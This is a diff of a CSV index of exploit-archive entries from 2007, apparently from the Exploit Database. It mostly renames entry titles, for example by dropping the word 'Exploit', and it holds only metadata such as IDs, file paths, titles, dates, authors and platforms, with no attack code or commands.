3396,platforms/linux/dos/3396.php,"PHP 4.4.4 - Unserialize() ZVAL Reference Counter Overflow (PoC)",2007-03-02,"Stefan Esser",linux,dos,0 3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143 39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80 3398,platforms/php/webapps/3398.txt,"Mani Stats Reader 1.2 - (ipath) Remote File Inclusion",2007-03-02,mozi,php,webapps,0 -3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String Exploit",2007-03-02,"Luigi Auriemma",windows,dos,0 +3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String",2007-03-02,"Luigi Auriemma",windows,dos,0 3400,platforms/php/webapps/3400.pl,"webSPELL 4.01.02 - Multiple SQL Injections",2007-03-02,DNX,php,webapps,0 3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - Remote PHP Code Execution",2007-03-03,DarkFig,php,webapps,0 3403,platforms/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Blind SQL Injection",2007-03-04,s0cratex,php,webapps,0 -3404,platforms/multiple/dos/3404.php,"PHP - wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0 +3404,platforms/multiple/dos/3404.php,"PHP - wddx_deserialize() String Append Crash",2007-03-04,"Stefan Esser",multiple,dos,0 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 PHPinfo() Remote Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote,0 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0 3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0 @@ -3095,7 +3096,7 @@ id,file,description,date,author,platform,type,port 3424,platforms/multiple/local/3424.php,"PHP 5.2.1 - substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 3425,platforms/multiple/remote/3425.txt,"mod_security 2.1.0 - (ASCIIZ byte) POST Rules Bypass",2007-03-07,"Stefan Esser",multiple,remote,0 3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 - (shmop functions) Local Code Execution",2007-03-07,"Stefan Esser",linux,local,0 -3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0 +3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure",2007-03-07,"Stefan Esser",linux,local,0 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 - (include online.txt) Remote Code Execution",2007-03-07,Dj7xpl,php,webapps,0 3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0 3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0 @@ -3108,7 +3109,7 @@ id,file,description,date,author,platform,type,port 3437,platforms/asp/webapps/3437.txt,"GaziYapBoz Game Portal - 'kategori.asp' SQL Injection",2007-03-08,CyberGhost,asp,webapps,0 3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - (mysave.php) Remote File Inclusion",2007-03-08,DNX,php,webapps,0 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0 -3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow Exploit",2007-03-09,"Stefan Esser",linux,local,0 +3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0 3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)",2007-03-09,"Daniel Roethlisberger",linux,dos,0 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0 3443,platforms/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusion",2007-03-09,K-159,php,webapps,0 @@ -3126,11 +3127,11 @@ id,file,description,date,author,platform,type,port 3457,platforms/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,php,webapps,0 3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0 3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0 -3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OS X) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0 +3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0 3461,platforms/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service",2007-03-12,"Umesh Wanve",windows,dos,0 -3462,platforms/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow Exploit (1)",2007-03-12,Marsu,windows,remote,0 -3463,platforms/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow Exploit (2)",2007-03-12,Marsu,windows,remote,0 -3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow Exploit",2007-03-12,Marsu,windows,dos,0 +3462,platforms/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (1)",2007-03-12,Marsu,windows,remote,0 +3463,platforms/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (2)",2007-03-12,Marsu,windows,remote,0 +3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow",2007-03-12,Marsu,windows,dos,0 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0 3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - (default.asp layout) SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php aide' Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 @@ -3179,10 +3180,10 @@ id,file,description,date,author,platform,type,port 3511,platforms/php/webapps/3511.pl,"ScriptMagix Photo Rating 2.0 - SQL Injection",2007-03-18,ajann,php,webapps,0 3512,platforms/php/webapps/3512.txt,"PHP-Nuke - iFrame (iframe.php) Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps,0 3513,platforms/php/webapps/3513.php,"Katalog Plyt Audio (pl) 1.0 - SQL Injection",2007-03-18,Kacper,php,webapps,0 -3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash Exploit",2007-03-18,DATA_SNIPER,windows,dos,0 +3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash",2007-03-18,DATA_SNIPER,windows,dos,0 3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - (index.php recid) SQL Injection",2007-03-19,ajann,php,webapps,0 -3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta - Remote File Upload Exploit",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 -3517,platforms/osx/local/3517.php,"PHP 5.2.0 (OS X) - header() Space Trimming Buffer Underflow Exploit",2007-03-19,"Stefan Esser",osx,local,0 +3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta - Arbitrary File Upload",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 +3517,platforms/osx/local/3517.php,"PHP 5.2.0 (OSX) - header() Space Trimming Buffer Underflow Exploit",2007-03-19,"Stefan Esser",osx,local,0 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion",2007-03-19,GoLd_M,php,webapps,0 3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a - SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 3520,platforms/asp/webapps/3520.txt,"NetVios Portal - 'page.asp' SQL Injection",2007-03-19,parad0x,asp,webapps,0 @@ -3205,7 +3206,7 @@ id,file,description,date,author,platform,type,port 3538,platforms/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps,0 3539,platforms/php/webapps/3539.txt,"mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (Egghunter)",2007-03-21,muts,windows,remote,143 -3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote SEH Overwrite",2007-03-22,"Umesh Wanve",windows,remote,69 +3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0 3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 - (idnews) SQL Injection",2007-03-22,"Mehmet Ince",php,webapps,0 3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0 @@ -3233,7 +3234,7 @@ id,file,description,date,author,platform,type,port 3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu 1.07 - Remote File Inclusion",2007-03-25,"Cold Zero",php,webapps,0 3568,platforms/php/webapps/3568.txt,"Free Image Hosting 2.0 - (AD_BODY_TEMP) Remote File Inclusion",2007-03-25,Crackers_Child,php,webapps,0 3569,platforms/php/webapps/3569.pl,"PBlang 4.66z - Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 -3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overflow Exploit",2007-03-25,niXel,windows,remote,21 +3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21 3571,platforms/linux/local/3571.php,"PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z - Remote Code Execution",2007-03-25,Hessam-x,php,webapps,0 @@ -3249,7 +3250,7 @@ id,file,description,date,author,platform,type,port 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g - KUPM$MCP.MAIN SQL Injection",2007-03-27,bunker,multiple,remote,0 3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double-Free (PoC)",2007-03-27,"Stefan Esser",linux,dos,0 -3587,platforms/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0 +3587,platforms/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)",2007-03-27,"Robert Swiecki",linux,local,0 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles 1.02 - (print.php id) SQL Injection",2007-03-27,WiLdBoY,php,webapps,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow (Metasploit)",2007-03-27,skillTube,windows,remote,80 3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine 2.8 - Blind SQL Injection",2007-03-27,ajann,php,webapps,0 @@ -3257,22 +3258,22 @@ id,file,description,date,author,platform,type,port 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion",2007-03-27,kezzap66345,php,webapps,0 3593,platforms/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local,0 3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - (index.php cat_id) SQL Injection",2007-03-28,ajann,php,webapps,0 -3595,platforms/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0 +3595,platforms/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)",2007-03-28,"Robert Swiecki",linux,local,0 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion",2007-03-28,GoLd_M,php,webapps,0 3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - (view.php id) SQL Injection",2007-03-28,ajann,php,webapps,0 3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - (quotes.php) Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - (inc/lang.php) Local File Inclusion",2007-03-29,GoLd_M,php,webapps,0 -3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'username' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 +3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - ''Username'' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection",2007-03-29,ajann,php,webapps,0 3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 3605,platforms/php/webapps/3605.php,"Picture-Engine 1.2.0 - (wall.php cat) SQL Injection",2007-03-29,Kacper,php,webapps,0 -3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Denial of Service Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0 +3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Denial of Service Hang / Crash",2007-03-29,shinnai,multiple,dos,0 3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Inclusion",2007-03-29,"ThE dE@Th",php,webapps,0 3608,platforms/php/webapps/3608.txt,"Advanced Login 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0 -3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0 +3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0 3611,platforms/php/webapps/3611.txt,"JC URLShrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository - 'viewcat.php' SQL Injection",2007-03-30,ajann,php,webapps,0 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0 @@ -3360,13 +3361,13 @@ id,file,description,date,author,platform,type,port 3699,platforms/php/webapps/3699.txt,"PHPGalleryScript 1.0 - (init.gallery.php include_class) Remote File Inclusion",2007-04-10,anonymous,php,webapps,0 3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 -3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution Exploit",2007-04-10,BlackHawk,php,webapps,0 +3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps,0 3703,platforms/php/webapps/3703.txt,"Joomla/Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 3704,platforms/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0 3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 -3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal Exploit",2007-04-11,shinnai,multiple,remote,0 +3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0 3710,platforms/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code Execution",2007-04-11,DarkFig,php,webapps,0 3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 - (codebreak.php) Remote File Inclusion",2007-04-11,"John Martinelli",php,webapps,0 @@ -3381,7 +3382,7 @@ id,file,description,date,author,platform,type,port 3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - (mailout.php) Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0 3722,platforms/php/webapps/3722.txt,"Expow 0.8 - (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0 3723,platforms/php/webapps/3723.txt,"Request It 1.0b - (index.php id) Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 -3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - (Specially Crafted 802.11 Packets) Remote Buffer Overflow Exploit",2007-04-12,"Jonathan So",linux,remote,0 +3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - (Specially Crafted 802.11 Packets) Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0 3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - (options.php/save.php) Remote Code Execution",2007-04-12,Gammarays,php,webapps,0 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service",2007-04-13,evilrabbi,multiple,dos,0 3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution",2007-04-13,InTeL,windows,local,0 @@ -3395,7 +3396,7 @@ id,file,description,date,author,platform,type,port 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"mambo/joomla Component article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139 -3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow Exploit",2007-04-15,rgod,windows,remote,80 +3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow",2007-04-15,rgod,windows,remote,80 3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0 3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow",2007-04-15,devcode,windows,remote,139 3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0 @@ -3414,7 +3415,7 @@ id,file,description,date,author,platform,type,port 3754,platforms/php/webapps/3754.pl,"MiniGal b13 - (image backdoor) Remote Code Execution",2007-04-17,Dj7xpl,php,webapps,0 3755,platforms/windows/local/3755.c,"Microsoft Windows GDI - Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full - Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 -3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String Exploit",2007-04-17,jamikazu,windows,local,0 +3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local,0 3758,platforms/php/webapps/3758.php,"ShoutPro 1.5.2 - (shout.php) Remote Code Injection",2007-04-17,Gammarays,php,webapps,0 3759,platforms/php/webapps/3759.pl,"Joomla Template Be2004-2 - 'index.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 3760,platforms/php/webapps/3760.txt,"jGallery 1.3 - 'index.php' Remote File Inclusion",2007-04-18,Dj7xpl,php,webapps,0 @@ -3444,7 +3445,7 @@ id,file,description,date,author,platform,type,port 3784,platforms/multiple/dos/3784.c,"Opera 9.2 - '.torrent' Remote Denial of Service",2007-04-23,n00b,multiple,dos,0 3785,platforms/php/webapps/3785.txt,"Post REvolution 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board - Multiple Remote File Inclusion",2007-04-24,"ThE TiGeR",php,webapps,0 -3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 +3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 3788,platforms/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 3789,platforms/windows/dos/3789.html,"Second Sight Software - ActiveMod.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 3790,platforms/windows/dos/3790.html,"NetSprint Toolbar - ActiveX toolbar.dll Denial of Service (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 @@ -3467,9 +3468,9 @@ id,file,description,date,author,platform,type,port 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow (PoC)",2007-04-27,mu-b,linux,dos,0 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,windows,remote,0 3809,platforms/php/webapps/3809.txt,"burnCMS 0.2 - (root) Remote File Inclusion",2007-04-27,GoLd_M,php,webapps,0 -3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow Exploit",2007-04-27,"Umesh Wanve",windows,remote,0 +3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0 3811,platforms/windows/local/3811.c,"Irfanview 4.00 - '.iff' Buffer Overflow",2007-04-27,Marsu,windows,local,0 -3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 +3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow",2007-04-27,Marsu,windows,local,0 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 @@ -3477,7 +3478,7 @@ id,file,description,date,author,platform,type,port 3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - (fileview.php album) Local File Inclusion",2007-04-29,DNX,php,webapps,0 3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - (index.php show) Remote File Inclusion",2007-04-29,kezzap66345,php,webapps,0 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - '.ra' Remote Denial of Service",2007-04-30,n00b,windows,dos,0 -3820,platforms/php/webapps/3820.php,"psipuss 1.0 - (editusers.php) Remote Change Admin Password Exploit",2007-04-30,Dj7xpl,php,webapps,0 +3820,platforms/php/webapps/3820.php,"psipuss 1.0 - (editusers.php) Remote Change Admin Password",2007-04-30,Dj7xpl,php,webapps,0 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0 3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g (Windows/x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,windows,remote,0 3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0 @@ -3513,7 +3514,7 @@ id,file,description,date,author,platform,type,port 3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3855,platforms/php/webapps/3855.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)",2007-05-04,Gu1ll4um3r0m41n,php,webapps,0 -3856,platforms/windows/local/3856.htm,"East Wind Software - (advdaudio.ocx 1.5.1.1) Local Buffer Overflow Exploit",2007-05-05,shinnai,windows,local,0 +3856,platforms/windows/local/3856.htm,"East Wind Software - (advdaudio.ocx 1.5.1.1) Local Buffer Overflow",2007-05-05,shinnai,windows,local,0 3857,platforms/php/webapps/3857.txt,"vm Watermark for Gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 3858,platforms/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution",2007-05-05,DarkFig,php,webapps,0 3859,platforms/php/webapps/3859.txt,"Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass",2007-05-05,Dj7xpl,php,webapps,0 @@ -3523,7 +3524,7 @@ id,file,description,date,author,platform,type,port 3863,platforms/php/webapps/3863.txt,"Wikivi5 - 'show.php sous_rep' Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 3864,platforms/php/webapps/3864.txt,"Friendly 1.0d1 - (friendly_path) Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - (RESPATH) Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 -3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Upload ActiveX 6.36 - (AddFile) Remote Denial of Service",2007-05-07,shinnai,windows,dos,0 +3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Upload - ActiveX 6.36 (AddFile) Remote Denial of Service",2007-05-07,shinnai,windows,dos,0 3867,platforms/php/webapps/3867.pl,"ACGVAnnu 1.3 - (acgv.php rubrik) Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 3868,platforms/php/webapps/3868.txt,"DynamicPAD 1.02.18 - (HomeDir) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 3869,platforms/php/webapps/3869.txt,"Berylium2 2003-08-18 - (beryliumroot) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 @@ -3537,9 +3538,9 @@ id,file,description,date,author,platform,type,port 3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0 3878,platforms/php/webapps/3878.txt,"Miplex2 - (SmartyFU.class.php) Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 